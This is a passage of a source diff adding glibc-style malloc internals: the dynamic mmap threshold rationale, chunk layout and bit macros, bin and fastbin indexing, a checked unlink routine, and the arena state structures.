+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb as was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system, by doing mmap the kernel just has no choice but
+  to zero.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmaped shared libaries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bitmachines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upperbound on the threshold satisfies requirement 2)
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(const char *str) __attribute__ ((noreturn));
+
+static void* mem2mem_check(void *p, size_t sz);
+static void top_check(void);
+static void munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/* Check if REQ overflows when padded and aligned and if the resulting value
+   is less than PTRDIFF_T.  Returns TRUE and the requested size or MINSIZE in
+   case the value is less than MINSIZE on SZ or false if any of the previous
+   check fail.  */
+static inline bool
+checked_request2size (size_t req, size_t *sz) __nonnull (1)
+{
+  if (__glibc_unlikely (req > PTRDIFF_MAX))
+    return false;
+  *sz = request2size (req);
+  return true;
+}
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if !prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceeded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
+
+/* Take a chunk off a bin list.  */
+static void
+unlink_chunk (mstate av, mchunkptr p)
+{
+  if (chunksize (p) != prev_size (next_chunk (p)))
+    malloc_printerr ("corrupted size vs. prev_size");
+
+  mchunkptr fd = p->fd;
+  mchunkptr bk = p->bk;
+
+  if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
+    malloc_printerr ("corrupted double-linked list");
+
+  fd->bk = bk;
+  bk->fd = fd;
+  if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
+    {
+      if (p->fd_nextsize->bk_nextsize != p
+	  || p->bk_nextsize->fd_nextsize != p)
+	malloc_printerr ("corrupted double-linked list (not small)");
+
+      if (fd->fd_nextsize == NULL)
+	{
+	  if (p->fd_nextsize == p)
+	    fd->fd_nextsize = fd->bk_nextsize = fd;
+	  else
+	    {
+	      fd->fd_nextsize = p->fd_nextsize;
+	      fd->bk_nextsize = p->bk_nextsize;
+	      p->fd_nextsize->bk_nextsize = fd;
+	      p->bk_nextsize->fd_nextsize = fd;
+	    }
+	}
+      else
+	{
+	  p->fd_nextsize->bk_nextsize = p->bk_nextsize;
+	  p->bk_nextsize->fd_nextsize = p->fd_nextsize;
+	}
+    }
+}
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks in the main arena.
+   Since do_check_malloc_state () checks this, we call malloc_consolidate ()
+   before changing max_fast.  Note other arenas will leak their fast bin
+   entries if max_fast is reduced.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? MIN_CHUNK_SIZE / 2 : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+
+static inline INTERNAL_SIZE_T
+get_max_fast (void)
+{
+  /* Tell the GCC optimizers that global_max_fast is never larger
+     than MAX_FAST_SIZE.  This avoids out-of-bounds array accesses in
+     _int_malloc after constant propagation of the size parameter.
+     (The code never executes because malloc preserves the
+     global_max_fast invariant, but the optimizers may not recognize
+     this.)  */
+  if (global_max_fast > MAX_FAST_SIZE)
+    __builtin_unreachable ();
+  return global_max_fast;
+}
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+/*
+   have_fastchunks indicates that there are probably some fastbin chunks.
+   It is set true on entering a chunk into any fastbin, and cleared early in
+   malloc_consolidate.  The value is approximate since it may be set when there
+   are no fastbin chunks, or it may be clear even if there are fastbin chunks
+   available.  Given it's sole purpose is to reduce number of redundant calls to
+   malloc_consolidate, it does not affect correctness.  As a result we can safely
+   use relaxed atomic accesses.
+ */
+
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Set if the fastbin chunks contain recently inserted free blocks.  */
+  /* Note this is a bool but not all targets support atomics on booleans.  */
+  int have_fastchunks;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
